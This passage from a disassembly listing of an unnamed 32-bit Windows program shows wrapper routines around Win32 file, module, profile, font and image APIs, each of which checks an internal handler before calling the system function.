mov eax, [ebp-20h]
mov [ebp-38h], eax
push dword ptr [ebp-38h]
call sub_5083DD
pop ecx
retn
sub_50A9C8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_50A8AA
loc_50A9D8: ; CODE XREF: sub_50A8AA+11C�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_50A8AA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50A9EC proc near ; CODE XREF: sub_40FFD8+1ED�p
; sub_410908+38�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_500672
test eax, eax
jnz short loc_50AA11
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_511700 ; GetFileSize
mov [ebp+var_4], eax
jmp short loc_50AA1D
; ---------------------------------------------------------------------------
loc_50AA11: ; CODE XREF: sub_50A9EC+12�j
cmp [ebp+arg_4], 0
jz short loc_50AA1D
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
loc_50AA1D: ; CODE XREF: sub_50A9EC+23�j
; sub_50A9EC+29�j
mov eax, [ebp+var_4]
leave
retn 8
sub_50A9EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50AA24 proc near ; CODE XREF: sub_401300+83�p
; sub_401404+DA�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_507141
add esp, 10h
test eax, eax
jnz short loc_50AA57
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_511714 ; GetModuleFileNameA
mov [ebp+var_4], eax
loc_50AA57: ; CODE XREF: sub_50AA24+1F�j
mov eax, [ebp+var_4]
leave
retn 0Ch
sub_50AA24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50AA5E proc near ; DATA XREF: _7:005113B0�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push edi
and [ebp+var_4], 0
mov eax, [ebp+arg_8]
inc eax
push eax
call sub_50835A
pop ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_8]
inc ecx
xor eax, eax
mov edi, [ebp+var_8]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+var_8]
push [ebp+arg_0]
call sub_507141
add esp, 10h
test eax, eax
jnz short loc_50AABF
push [ebp+arg_8]
push [ebp+var_8]
push [ebp+arg_0]
call ds:dword_511714 ; GetModuleFileNameA
mov [ebp+var_4], eax
loc_50AABF: ; CODE XREF: sub_50AA5E+4D�j
push [ebp+arg_8]
push [ebp+arg_4]
push 0FFFFFFFFh
push [ebp+var_8]
push 0
push 0
call ds:dword_511770 ; MultiByteToWideChar
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
push [ebp+var_10]
call sub_5083DD
pop ecx
mov eax, [ebp+var_4]
pop edi
leave
retn 0Ch
sub_50AA5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50AAEB proc near ; DATA XREF: _7:005113B8�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_5018CF
add esp, 10h
test eax, eax
jnz short loc_50AB36
push offset aKernel32_0 ; "kernel32"
push offset aGetlongpathnam ; "GetLongPathNameA"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_50AB36
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_8]
mov [ebp+var_4], eax
loc_50AB36: ; CODE XREF: sub_50AAEB+20�j
; sub_50AAEB+3A�j
mov eax, [ebp+var_4]
leave
retn 0Ch
sub_50AAEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50AB3D proc near ; DATA XREF: _7:005113C0�o
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0050AC52 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50EA98
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
and [ebp+var_1C], 0
mov eax, [ebp+arg_8]
inc eax
push eax
call sub_50835A
pop ecx
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov [ebp+var_24], eax
mov ecx, [ebp+arg_8]
inc ecx
xor eax, eax
mov edi, [ebp+var_24]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
push 400h
call sub_50835A
pop ecx
mov [ebp+var_34], eax
mov eax, [ebp+var_34]
mov [ebp+var_20], eax
and [ebp+var_4], 0
push 0
push 0
push 400h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_5117B8 ; WideCharToMultiByte
mov [ebp+var_28], eax
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push [ebp+var_24]
push [ebp+var_20]
call sub_5018CF
add esp, 10h
test eax, eax
jnz short loc_50AC0B
push offset aKernel32_0 ; "kernel32"
push offset aGetlongpathn_0 ; "GetLongPathNameW"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_50AC09
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_2C]
mov [ebp+var_1C], eax
loc_50AC09: ; CODE XREF: sub_50AB3D+BB�j
jmp short loc_50AC28
; ---------------------------------------------------------------------------
loc_50AC0B: ; CODE XREF: sub_50AB3D+A1�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+arg_8]
jnb short loc_50AC28
push [ebp+arg_8]
push [ebp+arg_4]
push 0FFFFFFFFh
push [ebp+var_24]
push 0
push 0
call ds:dword_511770 ; MultiByteToWideChar
loc_50AC28: ; CODE XREF: sub_50AB3D:loc_50AC09�j
; sub_50AB3D+D4�j
or [ebp+var_4], 0FFFFFFFFh
call sub_50AC33
jmp short loc_50AC52
sub_50AB3D endp
; =============== S U B R O U T I N E =======================================
sub_50AC33 proc near ; CODE XREF: sub_50AB3D+EF�p
; DATA XREF: _6:0050EAA0�o
mov eax, [ebp-24h]
mov [ebp-38h], eax
push dword ptr [ebp-38h]
call sub_5083DD
pop ecx
mov eax, [ebp-20h]
mov [ebp-3Ch], eax
push dword ptr [ebp-3Ch]
call sub_5083DD
pop ecx
retn
sub_50AC33 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_50AB3D
loc_50AC52: ; CODE XREF: sub_50AB3D+F4�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_50AB3D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50AC66 proc near ; DATA XREF: _7:00511370�o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
xor edx, edx
mov ecx, [ebp+arg_14]
call sub_5019D2
test eax, eax
jz short loc_50ACE9
push 0
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_501CC4
add esp, 1Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_50ACE7
cmp [ebp+arg_8], 0
jz short loc_50ACE7
mov eax, [ebp+arg_10]
dec eax
push eax
push [ebp+arg_8]
push [ebp+arg_C]
call sub_4FC770
add esp, 0Ch
mov edi, [ebp+arg_8]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_10]
jnb short loc_50ACDB
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
jmp short loc_50ACE1
; ---------------------------------------------------------------------------
loc_50ACDB: ; CODE XREF: sub_50AC66+6B�j
mov eax, [ebp+arg_10]
mov [ebp+var_C], eax
loc_50ACE1: ; CODE XREF: sub_50AC66+73�j
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
loc_50ACE7: ; CODE XREF: sub_50AC66+3A�j
; sub_50AC66+40�j
jmp short loc_50AD04
; ---------------------------------------------------------------------------
loc_50ACE9: ; CODE XREF: sub_50AC66+15�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_511724 ; GetPrivateProfileStringA
mov [ebp+var_4], eax
loc_50AD04: ; CODE XREF: sub_50AC66:loc_50ACE7�j
mov eax, [ebp+var_4]
pop edi
leave
retn 18h
sub_50AC66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50AD0C proc near ; DATA XREF: _7:00511378�o
var_58 = dword ptr -58h
var_54 = byte ptr -54h
var_53 = byte ptr -53h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 58h
push edi
and [ebp+var_4], 0
push 0
xor edx, edx
mov ecx, [ebp+arg_C]
call sub_5019D2
test eax, eax
jz short loc_50AD76
and [ebp+var_54], 0
push 13h
pop ecx
xor eax, eax
lea edi, [ebp+var_53]
rep stosd
stosw
stosb
push 0
push [ebp+arg_C]
push 50h
lea eax, [ebp+var_54]
push eax
push offset dword_511918
push [ebp+arg_4]
push [ebp+arg_0]
call sub_501CC4
add esp, 1Ch
mov [ebp+var_58], eax
cmp [ebp+var_58], 0
jnz short loc_50AD67
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
jmp short loc_50AD74
; ---------------------------------------------------------------------------
loc_50AD67: ; CODE XREF: sub_50AD0C+51�j
lea eax, [ebp+var_54]
push eax
call sub_4FCA75
pop ecx
mov [ebp+var_4], eax
loc_50AD74: ; CODE XREF: sub_50AD0C+59�j
jmp short loc_50AD8B
; ---------------------------------------------------------------------------
loc_50AD76: ; CODE XREF: sub_50AD0C+19�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_51171C ; GetPrivateProfileIntA
mov [ebp+var_4], eax
loc_50AD8B: ; CODE XREF: sub_50AD0C:loc_50AD74�j
mov eax, [ebp+var_4]
pop edi
leave
retn 10h
sub_50AD0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50AD93 proc near ; DATA XREF: _7:00511380�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push 0
xor edx, edx
mov ecx, [ebp+arg_8]
call sub_5019D2
test eax, eax
jz short loc_50ADC5
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push 0
push 0
push 0
call sub_501CC4
add esp, 1Ch
mov [ebp+var_4], eax
jmp short loc_50ADD7
; ---------------------------------------------------------------------------
loc_50ADC5: ; CODE XREF: sub_50AD93+12�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_511720 ; GetPrivateProfileSectionNamesA
mov [ebp+var_4], eax
loc_50ADD7: ; CODE XREF: sub_50AD93+30�j
mov eax, [ebp+var_4]
leave
retn 0Ch
sub_50AD93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50ADDE proc near ; DATA XREF: _7:00511388�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push 0
xor edx, edx
mov ecx, [ebp+arg_C]
call sub_5019D2
test eax, eax
jz short loc_50AE11
push 1
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push 0
push 0
push [ebp+arg_0]
call sub_501CC4
add esp, 1Ch
mov [ebp+var_4], eax
jmp short loc_50AE26
; ---------------------------------------------------------------------------
loc_50AE11: ; CODE XREF: sub_50ADDE+12�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_50E02C ; GetPrivateProfileSectionA
mov [ebp+var_4], eax
loc_50AE26: ; CODE XREF: sub_50ADDE+31�j
mov eax, [ebp+var_4]
leave
retn 10h
sub_50ADDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50AE2D proc near ; CODE XREF: sub_50AE83+8�p
; sub_50AE96+9�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jnz short loc_50AE43
push 7Eh
call ds:dword_51178C ; RtlRestoreLastWin32Error
xor eax, eax
jmp short locret_50AE81
; ---------------------------------------------------------------------------
loc_50AE43: ; CODE XREF: sub_50AE2D+8�j
mov ecx, [ebp+arg_0]
call sub_505AD2
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_50AE7E
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
call sub_5061E1
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_50AE7E
call ds:dword_511710 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_50AE7A
push 7Eh
call ds:dword_51178C ; RtlRestoreLastWin32Error
loc_50AE7A: ; CODE XREF: sub_50AE2D+43�j
xor eax, eax
jmp short locret_50AE81
; ---------------------------------------------------------------------------
loc_50AE7E: ; CODE XREF: sub_50AE2D+25�j
; sub_50AE2D+39�j
mov eax, [ebp+var_4]
locret_50AE81: ; CODE XREF: sub_50AE2D+14�j
; sub_50AE2D+4F�j
leave
retn
sub_50AE2D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50AE83 proc near ; CODE XREF: sub_409D10+13A�p
; sub_409D10+519�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push [ebp+arg_0]
call sub_50AE2D
pop ecx
pop ecx
pop ebp
retn 4
sub_50AE83 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50AE96 proc near ; CODE XREF: sub_509518+B9�p
; sub_509789+B9�p ...
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push [ebp+arg_8]
push [ebp+arg_0]
call sub_50AE2D
pop ecx
pop ecx
pop ebp
retn 0Ch
sub_50AE96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50AEAA proc near ; CODE XREF: sub_50AF65+8�p
; sub_50AF78+9�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50EAA8
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
cmp [ebp+arg_0], 0
jnz short loc_50AEE1
push 7Eh
call ds:dword_51178C ; RtlRestoreLastWin32Error
xor eax, eax
jmp short loc_50AF56
; ---------------------------------------------------------------------------
loc_50AEE1: ; CODE XREF: sub_50AEAA+29�j
and [ebp+var_1C], 0
and [ebp+var_4], 0
push 104h
call sub_50835A
pop ecx
mov [ebp+var_20], eax
mov eax, [ebp+var_20]
mov [ebp+var_1C], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_1C]
rep stosd
push 0
push 0
push 104h
push [ebp+var_1C]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_5117B8 ; WideCharToMultiByte
push [ebp+arg_4]
push [ebp+var_1C]
call sub_50AE2D
pop ecx
pop ecx
push 0FFFFFFFFh
mov [ebp+var_28], eax
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_28]
jmp short loc_50AF56
; ---------------------------------------------------------------------------
loc_50AF44: ; DATA XREF: _6:0050EAB0�o
mov eax, [ebp+var_1C]
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_5083DD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_50AF56: ; CODE XREF: sub_50AEAA+35�j
; sub_50AEAA+98�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_50AEAA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50AF65 proc near ; DATA XREF: _7:005112D8�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push [ebp+arg_0]
call sub_50AEAA
pop ecx
pop ecx
pop ebp
retn 4
sub_50AF65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50AF78 proc near ; DATA XREF: _7:005112E8�o
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push [ebp+arg_8]
push [ebp+arg_0]
call sub_50AEAA
pop ecx
pop ecx
pop ebp
retn 0Ch
sub_50AF78 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50AF8C proc near ; CODE XREF: sub_401404+D3�p
; sub_409D10+F�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jnz short loc_50AFA0
push 0
call ds:dword_511718 ; GetModuleHandleA
jmp short locret_50AFC2
; ---------------------------------------------------------------------------
loc_50AFA0: ; CODE XREF: sub_50AF8C+8�j
push [ebp+arg_0]
call ds:dword_511718 ; GetModuleHandleA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_50AFBF
xor dl, dl
mov ecx, [ebp+arg_0]
call sub_5058CF
mov [ebp+var_4], eax
loc_50AFBF: ; CODE XREF: sub_50AF8C+24�j
mov eax, [ebp+var_4]
locret_50AFC2: ; CODE XREF: sub_50AF8C+12�j
leave
retn 4
sub_50AF8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50AFC6 proc near ; DATA XREF: _7:00511358�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0050B062 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50EAB8
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
cmp [ebp+arg_0], 0
jnz short loc_50AFFB
push 0
call ds:dword_511718 ; GetModuleHandleA
jmp short loc_50B065
; ---------------------------------------------------------------------------
loc_50AFFB: ; CODE XREF: sub_50AFC6+29�j
and [ebp+var_1C], 0
and [ebp+var_20], 0
and [ebp+var_4], 0
push 104h
call sub_50835A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_20], eax
xor eax, eax
mov edi, [ebp+var_20]
stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_5117B8 ; WideCharToMultiByte
push [ebp+var_20]
call sub_50AF8C
mov [ebp+var_1C], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_50B052
jmp short loc_50B062
sub_50AFC6 endp
; =============== S U B R O U T I N E =======================================
sub_50B052 proc near ; CODE XREF: sub_50AFC6+85�p
; DATA XREF: _6:0050EAC0�o
mov eax, [ebp-20h]
mov [ebp-28h], eax
push dword ptr [ebp-28h]
call sub_5083DD
pop ecx
retn
sub_50B052 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_50AFC6
loc_50B062: ; CODE XREF: sub_50AFC6+8A�j
mov eax, [ebp+var_1C]
loc_50B065: ; CODE XREF: sub_50AFC6+33�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; END OF FUNCTION CHUNK FOR sub_50AFC6
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B076 proc near ; CODE XREF: sub_409D10+29�p
; sub_409D10+36�p ...
var_30 = dword ptr -30h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0050B179 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50EAC8
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_1C], 0
mov eax, [ebp+arg_4]
shr eax, 10h
movzx eax, ax
test eax, eax
jz short loc_50B0C9
push offset aDllgetclassobj ; "DllGetClassObject"
push [ebp+arg_4]
call ds:dword_5117C0 ; lstrcmpi
test eax, eax
jnz short loc_50B0C9
mov ecx, [ebp+arg_0]
call sub_505A41
loc_50B0C9: ; CODE XREF: sub_50B076+37�j
; sub_50B076+49�j
and [ebp+var_4], 0
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_511728 ; GetProcAddress
mov [ebp+var_1C], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_50B0F9
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
and [ebp+var_30], 0
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_30]
jmp loc_50B17C
; ---------------------------------------------------------------------------
loc_50B0F9: ; CODE XREF: sub_50B076+6A�j
cmp [ebp+var_1C], 0
jz short loc_50B179
mov eax, ds:dword_5160D4
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_50B120
mov eax, [ebp+var_24]
add eax, 10h
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
mov [ebp+var_28], 1
jmp short loc_50B124
; ---------------------------------------------------------------------------
loc_50B120: ; CODE XREF: sub_50B076+95�j
and [ebp+var_28], 0
loc_50B124: ; CODE XREF: sub_50B076+A8�j
movzx eax, [ebp+var_28]
test eax, eax
jz short loc_50B179
mov [ebp+var_4], 1
push [ebp+var_1C]
mov ecx, ds:dword_5160D4
call sub_50B871
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_50B152
mov eax, [ebp+var_20]
mov eax, [eax]
mov [ebp+var_1C], eax
loc_50B152: ; CODE XREF: sub_50B076+D2�j
or [ebp+var_4], 0FFFFFFFFh
call sub_50B15D
jmp short loc_50B179
sub_50B076 endp
; =============== S U B R O U T I N E =======================================
sub_50B15D proc near ; CODE XREF: sub_50B076+E0�p
; DATA XREF: _6:0050EADC�o
mov eax, ds:dword_5160D4
mov [ebp-2Ch], eax
cmp dword ptr [ebp-2Ch], 0
jz short locret_50B178
mov eax, [ebp-2Ch]
add eax, 10h
push eax
call ds:dword_50E018 ; RtlLeaveCriticalSection
locret_50B178: ; CODE XREF: sub_50B15D+C�j
retn
sub_50B15D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_50B076
loc_50B179: ; CODE XREF: sub_50B076+87�j
; sub_50B076+B4�j ...
mov eax, [ebp+var_1C]
loc_50B17C: ; CODE XREF: sub_50B076+7E�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_50B076
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B18D proc near ; CODE XREF: sub_41786C+170�p
; sub_419229+C3�p ...
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50EAE0
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_1C], 0
push [ebp+arg_0]
call ds:dword_5116E0 ; FreeLibrary
jmp short loc_50B1D9
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_24], 1
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_24]
loc_50B1D9: ; CODE XREF: sub_50B18D+35�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_50B18D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B1EA proc near ; DATA XREF: _7:off_5113D8�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
mov eax, [ebp+arg_14]
and eax, 10h
test eax, eax
jz short loc_50B216
cmp [ebp+arg_8], 0
jnz short loc_50B216
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
call sub_4FF036
test eax, eax
jnz short loc_50B216
and [ebp+var_4], 0
loc_50B216: ; CODE XREF: sub_50B1EA+10�j
; sub_50B1EA+16�j ...
cmp [ebp+var_4], 0
jnz short loc_50B237
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_5117CC ; LoadImageA
mov [ebp+var_4], eax
loc_50B237: ; CODE XREF: sub_50B1EA+30�j
mov eax, [ebp+var_4]
leave
retn 18h
sub_50B1EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B23E proc near ; DATA XREF: _7:off_5113C8�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push offset dword_50E5C4
push offset aAddfontresou_0 ; "AddFontResourceA"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_4FF94C
test eax, eax
jnz short loc_50B270
push [ebp+arg_0]
call [ebp+var_8]
mov [ebp+var_4], eax
loc_50B270: ; CODE XREF: sub_50B23E+27�j
mov eax, [ebp+var_4]
leave
retn 4
sub_50B23E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B277 proc near ; DATA XREF: _7:005113D0�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push offset dword_50E5C4
push offset aRemovefontre_0 ; "RemoveFontResourceA"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_4FFD24
test eax, eax
jnz short loc_50B2A9
push [ebp+arg_0]
call [ebp+var_8]
mov [ebp+var_4], eax
loc_50B2A9: ; CODE XREF: sub_50B277+27�j
mov eax, [ebp+var_4]
leave
retn 4
sub_50B277 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50B2B0 proc near ; CODE XREF: sub_40E29B+A3�p
; sub_40FFD8+1C3�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_14]
and eax, 40000000h
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_10]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_500346
test eax, eax
jnz short loc_50B2F7
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_5116A8 ; CreateFileA
mov [ebp+var_4], eax
